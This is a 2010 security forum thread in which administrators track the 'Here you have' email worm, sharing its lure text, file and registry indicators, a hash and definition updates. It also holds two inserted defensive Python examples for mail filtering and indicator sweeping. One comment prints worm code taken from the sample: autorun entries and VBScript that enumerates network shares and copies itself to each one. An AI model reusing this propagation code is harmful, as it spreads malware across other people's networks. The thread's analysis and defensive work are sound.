0 Day threat/multiple spam messages "Here you have"
Updated: 09 Sep 2010 | 46 comments
Anyone else experiencing this? Body of the messages hitting our GAL are as follows:
Hello:
This is The Document I told you about,you can find it Here.http://www.sharedocuments ******malicious link*************
Please check it and reply as soon as possible.
Cheers,
Comments
We are seeing it here in California.
Link is to a file with a .scr
Link is to a file with a .scr extension, but appears to be an executable. Messages are originating from our internal Exchange users and being sent to multiple distribution lists.
Many reports of this coming in - http://www.google.com/search?q=here+you+have+virus...
We have got the same; any solution from Symantec yet?
I opened a case with Symantec support, they said a rapid release definition is forthcoming but no ETA at this time.
Same here at my firm
Huge virus outbreak at my firm.
If anyone does get word on a rapid release, please share.
This is better served with an anti-spam product and not Endpoint Protection which has no Anti-spam capabilities natively.
It was submitted to Symantec's brightmail submission line for North America and I'm sure an anti-spam rule will be created asap.
There is an online portal, save yourself the long hold times. Create ticket online, then call in with ticket # in hand :-) http://mysupport.symantec.com "We backup data to restore, we don't backup data just to back it up."
The messages are internal, so obviously malware is involved here.
Seen it, have some details
Here's what we've pulled out so far. Your mileage may vary.
The malicious file linked in the e-mail is shown as a pdf but it's actually a .scr. I don't have the site here but we blocked it first thing.
Files:
Look for n73.image12.03.2009.JPG.scr and kill it. Registry entries show "pdf*.scr", so anything matching that pattern is suspect.
In c:\windows:
Csrss.exe <- that's a big part of this
ff.exe
gc.exe
hst.iq
ie.exe
im.exe
op.exe
pspv.exe
rd.exe
re.exe
re.iq
tryme1.exe
Registry:
Hklm\software\microsoft\windows nt\currentversion\image file execution options\<any key ending in ExE> <- pay attention to the case
Hklm\software\microsoft\search assistant\ACMru\5603 and possibly 5604
Here's some code we pulled out of the .scr
[autorun]
open=open.exe
icon=%windir%\system32\shell32.dll,8
action=Open Drive to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
' List Network Shares
Const HKEY_LOCAL_MACHINE = &H80000002
dim i
i="0"
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colShares = objWMIService.ExecQuery("Select * from Win32_Share")
For each objShare in colShares
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
strValueName = i
strValue = objShare.Path
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
i = i + 1
Next
on error resume next
Dim domain
Dim computer
Set domain = GetObject("WinNT://Workgroup")
domain.Filter = Array("Computer")
For Each computer In domain
strComp = computer.Name
DoEvents
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\d\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\c\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\New Folder\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\music\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\print\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\E\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\F\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\G\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\H\" & "N73.Image12.03.2009.JPG.scr"
Next
Text4
[autorun]
open=open.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
/back to work, don't ask me for help, I'm a little busy lol
MD5 hash of trojan
2bde56d8fb2df4438192fb46cd0cc9c9
you're welcome
Link in the email is to http://members.multimedia.co.uk/............
Getting hit by "Here you have" here too
First hit our corporate office and then spread through our subs. First reports were at about 11:21am PDT. Two hours later, Symantec has not raised their threat level and I cannot find any patches yet.
open.exe
We are finding open.exe and autorun.inf in their h drives
We submitted a copy to Symantec....
We submitted to Symantec and here is the response:
We have processed your submission (Tracking #------------) and your submission
is now closed. The following is a report of our findings for the files in
your submission:
File: C:\Documents and
Settings\<some user id here>\Desktop\PDF_Document21_025542010_pdf.scr.trojan
Machine: Machine
Determination: This file is detected as 'Trojan Horse, ' with our existing
Rapid Release definition set.
URL: http://www.symantec.com/avcenter/venc/data/trojan.horse.html
The link goes to "rapid release" defs from 2004. So by Symantec's logic, this is something already handled by SEP?
/golf clap.
SEP will not stop a spam email if there's no malicious code in it as it's not an anti-spam product. The malicious code comes from clicking on the link IN the email. As Teiva-boy said, if you want to stop the email itself from spreading to your user, use your anti-spam solution to do so, and educate your users to not click on the link inside the email.
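The two posts above split the problem into the mail layer (stop the lure before it reaches users) and the endpoint layer (stop the .scr once clicked). The following is an added example of the mail-layer check, written for this thread and not taken from Symantec Brightmail or any vendor rule set. It parses a message with the standard library, extracts the links, and quarantines mail whose link resolves to an executable extension or whose body carries the "This is The Document I told you about" lure. The sample messages, the addresses and the sharedocuments.example.invalid host are constructed placeholders; the real link in the thread was masked by the original poster.

```python
"""Added example: mail-layer triage for the 'Here you have' lure.

Illustrative code written for this thread, not a vendor anti-spam rule.
Sample messages and hostnames below are constructed placeholders.
"""
import re
from email import message_from_string
from email.message import Message

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# Phrases taken from the lure body quoted at the top of the thread
LURE_PHRASES = ("this is the document i told you about", "you can find it here")
# .scr is what the thread reports; the other extensions are an assumption
EXEC_EXT = (".scr", ".exe", ".pif", ".com")


def message_body(msg: Message) -> str:
    """Concatenate the decoded text parts of a message (multipart or not)."""
    parts = []
    for part in msg.walk():
        if part.get_content_type().startswith("text/"):
            payload = part.get_payload(decode=True) or b""
            charset = part.get_content_charset() or "utf-8"
            parts.append(payload.decode(charset, "replace"))
    return "\n".join(parts)


def classify(raw: str) -> dict:
    """Return a verdict ('quarantine' or 'deliver'), the reasons, and the links found."""
    msg = message_from_string(raw)
    body = message_body(msg)
    lowered = body.lower()
    urls = URL_RE.findall(body)
    reasons = []
    for url in urls:
        # Strip query/fragment and a trailing period before checking the extension
        path = url.split("?", 1)[0].split("#", 1)[0].rstrip(".")
        if path.lower().endswith(EXEC_EXT):
            reasons.append(f"link to executable: {url}")
    if any(phrase in lowered for phrase in LURE_PHRASES):
        reasons.append("body matches the 'Here you have' lure text")
    if (msg.get("subject") or "").strip().lower() == "here you have":
        reasons.append("subject is the known lure subject")
    verdict = "quarantine" if reasons else "deliver"
    return {"verdict": verdict, "reasons": reasons, "urls": urls}


# Constructed sample: the lure as quoted in the thread, with a placeholder link
SAMPLE_LURE = (
    "From: someone@corp.example\n"
    "To: all-staff@corp.example\n"
    "Subject: Here you have\n"
    "Content-Type: text/plain\n"
    "\n"
    "Hello:\n"
    "This is The Document I told you about,you can find it Here."
    "http://sharedocuments.example.invalid/PDF_Document21_025542010_pdf.scr\n"
    "Please check it and reply as soon as possible.\n"
    "Cheers,\n"
)

# Constructed sample: an ordinary message with a document link
SAMPLE_BENIGN = (
    "From: someone@corp.example\n"
    "To: team@corp.example\n"
    "Subject: Agenda\n"
    "Content-Type: text/plain\n"
    "\n"
    "See the agenda at http://intranet.example/agenda.pdf\n"
)


if __name__ == "__main__":
    for sample in (SAMPLE_LURE, SAMPLE_BENIGN):
        print(classify(sample))
```

The extension check is deliberately applied to the link target rather than to an attachment, because, as the thread notes, this worm arrives as a link to a hosted .scr rather than as an attached file; a gateway rule that only inspects attachments will pass it.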
SEP *should* stop malicious code from running
Ted - I understand your point about spam and we are working to address that on our mail servers and spam blocking tools. However, my concern is that once the link is clicked, SEP should block the malicious code from running and replicating the virus on the computer. Our SEP is up to date and yet users (who shouldn't click on the link, but still do) are getting infected. Does Symantec not intend to address this issue?
This is a new variant of W32.Imsolk.A@mm. Have you downloaded the latest rapid release definitions? If not, then you do not have the most current definitions for this threat. "Trojan Horse" is a generic detection, which is most likely why the link for the RR definitions the previous poster received was from 2004.
Edit: Actually it seems that new definitions are not out yet according to an earlier poster in this thread. But as he said, Security Response is working on it.
SEP *should* stop malicious code from running
I completely agree with this. SEP Proactive Threat Protection should be able to catch this process SSMYPICS SCR running in memory. Plus, you can't even add this to the exception list (only allows .EXE) to stop/quarantine it.
It's broke.
Just got off the phone with support. They said any rapid release definition sequence 114819 or higher should do the trick.
Thanks for the information.
There you have it folks, go get the RR definitions ASAP.
JDB File
If I update my SEPM using the JDB file procedures will my client get the new rapid release defs thru LU?
Yup, run command on your groups and tell them to update content.
Is this only if you use your SEPM in conjunction with LOCAL LiveUpdate server, or will SEPM actually feed rapid definitions to clients regardless? Also, does anyone know if after running rapid release defs, main page on SEP client should change?
Also just got an email from our SE. They will be releasing certified defs at 7PM EST. Hope that helps.
Any update to the releasing of the updates?
FYI - we called a bit ago and the one that will come through Live Updates hasn't been released.
Clarification
Trojan Horse is indeed a generic detection, and while the initial date on the threat on the Security Response page may be dated 2004, additional detections are being added all the time.
sandra
Symantec Endpoint & Mobility Group / Information Development
Don't forget to mark your thread as 'solved' with the answer that best helped you!
To note, it spreads via network drive too, or should I say, it's copying autorun.inf and open.exe (inf points to exe, naturally) to ALL drives in My Computer, and if there are mapped drives, it will drop these two files in the root there as well. So scan your servers, too!
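The "Seen it, have some details" post earlier in the thread lists the dropped file names, the pdf*.scr pattern and an MD5, and the post above adds that autorun.inf and open.exe land in the root of every drive and mapped share. The following is an added example of a sweep that checks one root for those indicators; it is written for this thread and is not Symantec's code or a removal tool. The file names and the hash are taken only from the comments above and are treated as thread-sourced, not as an authoritative list; the demo directory is constructed here with placeholder files so the script runs anywhere, and on a real host you would point sweep_root at each drive root and share root instead.

```python
"""Added example: sweep a drive or share root for the artifacts this thread describes.

Written for this thread; not vendor code. Indicator names and the MD5 come from
the comments above. The demo directory is constructed with placeholder files.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Indicators quoted in the thread (treat as thread-sourced, not authoritative)
KNOWN_MD5 = {"2bde56d8fb2df4438192fb46cd0cc9c9"}
DROPPED_NAMES = {
    "csrss.exe", "ff.exe", "gc.exe", "hst.iq", "ie.exe", "im.exe", "op.exe",
    "pspv.exe", "rd.exe", "re.exe", "re.iq", "tryme1.exe", "open.exe",
    "n73.image12.03.2009.jpg.scr",
}
# The thread reports registry entries matching "pdf*.scr"
PDF_SCR = re.compile(r"^pdf.*\.scr$", re.IGNORECASE)


def parse_autorun(text: str) -> dict:
    """Return the key=value pairs of an [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def autorun_findings(inf_path: Path) -> list:
    """Reasons an autorun.inf looks like the one posted (open=/shell command to a local exe)."""
    reasons = []
    try:
        entries = parse_autorun(inf_path.read_text(errors="replace"))
    except OSError:
        return reasons
    for key in ("open", "shell\\open\\command"):
        target = entries.get(key, "")
        if target.lower().endswith(".exe") and (inf_path.parent / target).exists():
            reasons.append(f"{key}={target} launches an executable beside the inf")
    if "view files" in entries.get("action", "").lower():
        reasons.append("action string mimics the Explorer AutoPlay prompt")
    return reasons


def md5_of(path: Path) -> str:
    """Hex MD5 of a file, read in chunks."""
    digest = hashlib.md5()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep_root(root) -> dict:
    """Check one drive/share root for autorun.inf, the dropped names and the known hash."""
    root = Path(root)
    result = {"autorun": [], "dropped": [], "hash_hits": []}
    inf = root / "autorun.inf"
    if inf.is_file():
        result["autorun"] = autorun_findings(inf)
    for entry in root.iterdir():
        if not entry.is_file():
            continue
        name = entry.name.lower()
        if name in DROPPED_NAMES or PDF_SCR.match(name):
            result["dropped"].append(entry.name)
        if name.endswith((".exe", ".scr")) and md5_of(entry) in KNOWN_MD5:
            result["hash_hits"].append(entry.name)
    result["dropped"].sort()
    return result


def make_demo_root() -> str:
    """Constructed sample: a root laid out as the thread describes (placeholder files, not malware)."""
    root = tempfile.mkdtemp(prefix="hyh_demo_")
    Path(root, "autorun.inf").write_text(
        "[autorun]\nopen=open.exe\nicon=%windir%\\system32\\shell32.dll,8\n"
        "action=Open Drive to view files\nshell\\open=Open\n"
        "shell\\open\\command=open.exe\nshell\\open\\default=1\n")
    Path(root, "open.exe").write_bytes(b"placeholder, not an executable\n")
    Path(root, "PDF_Document21_025542010_pdf.scr").write_bytes(b"placeholder\n")
    Path(root, "report.txt").write_text("benign file\n")
    return root


if __name__ == "__main__":
    print(sweep_root(make_demo_root()))
```

Note that csrss.exe is a legitimate process when it runs from system32; the thread flags a copy in C:\Windows itself, so include that directory in the sweep rather than excluding the name outright.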
From Security Response's page:
"Enterprise customers are protected by a Rapid Release signature set dated Sep 9th 2010 rev 023, or later. The next regular definition set to be published at 16:00 PST Sep 9th 2010 will contain the detection."
Current definitions, as of this writing:
Multiple Daily Updates
Virus Definitions created 9/9/2010
Virus Definitions released 9/9/2010
Defs Version: 120909x
Sequence Number: 114820
Extended Version: 9/9/2010 rev. 24
Total Detections (Threats & Risks): 8483569
Daily Updates
Virus Definitions created 9/9/2010
Virus Definitions released 9/9/2010
Defs Version: 120909x
Sequence Number: 114820
Extended Version: 9/9/2010 rev. 24
Total Detections (Threats & Risks): 8483569
Detection for this threat should therefore be included currently.
sandra
Symantec Endpoint & Mobility Group / Information Development
Has the ETA for the certified definitions been pushed back?
Will a removal tool be posted? McAfee appears to have one...
Is there a location where Symantec is posting new information about this? A blog perhaps?
These are the best analysis links I've come across thus far:
http://www.threatexpert.com/report.aspx?md5=2bde56d8fb2df4438192fb46cd0cc9c9
http://www.threatexpert.com/report.aspx?md5=bd9208edf44d0ee32b974a2d9da7bc61
Does anyone know if SEP does a quick on-access scan once new definitions are loaded? I got r24 but csrss.exe is still alive and happy in memory and can be seen in Task Manager.
Email I received from Symantec at 9pm EST indicates this is fixed in definitions "rev. 037".
I'm only seeing rev 024 on the web site and it's now 11:45pm EST. Hello Symantec, anybody home?
I believe r37 are rapid dats. However, as in my post above, even rapid dats are unable to disinfect the file from memory.
You should be able to set a scan "when new defs arrive" in SEPM
Endpoint Knowledge Base
Security Best Practices
The latest rapid release is dated 2010.09.09 rev.50.
Prachand Kumar MCSE-2003 Symantec Technical Specialist (SCTS)
Do you have a direct link for these?
Who marks a post as "solution"? Shouldn't the affected customers decide when the issue has been resolved?
Have tried with this
http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-090922-4703-99&tabid=3
http://support.microsoft.com/kb/q263455/
If this Info helps to resolve the issue please Mark as Solution
Thanks
First update using rapid release updates and then try to scan. A signature has been added in the latest rapid release (ref: Security Response). You can download it from this link:
Rapid Release Virus Definitions
Please don't forget to mark your thread solved with whatever answer helped you : ) Thanks & Regards Aravind
If you want to know how to update using rapid release, refer to these KBs:
How to update definitions for Symantec Endpoint Protection Manager using a JDB file
Using Rapid Release virus definitions to update Symantec AntiVirus 10.x or Symantec Client Security 3.x clients and server
How to update definitions for Symantec Endpoint Protection using the Intelligent Updater
Thanks & Regards Aravind
Good Blog Post
Hello Forum Community,
This blog posting is quite good.
New Round of Email Worm, "Here you have" https://www-secure.symantec.com/connect/blogs/new-round-email-worm-here-you-have
Thanks and best regards,
Mick
Here is a writeup for the same
W32.Imsolk.B@mm
Web URL: http://www.symantec.com/security_response/writeup....
Certified LiveUpdate definitions have now been posted for the same.
Thanks & Regards,
Mudit Kumar
One question
At first many thanks for the given Information!
I used the rapid release update and the client(s) show Signature version 0909 v54 but in the dashboard the client is still shown as vulnerable to this threat!
Why is that?
Regards
Stephan Gruhn
I'm guessing you mean the dashboard on the SEPM, which is reporting historical information (last 12 hours). Go with the actual signature date/revision.
sandra
Symantec Endpoint & Mobility Group / Information Development
So how can I compare the actual vulnerability status to the signature implemented on the client? Is there a resource where I can look up which definitions protect me against a specific threat?
Thanks for the help
Stephan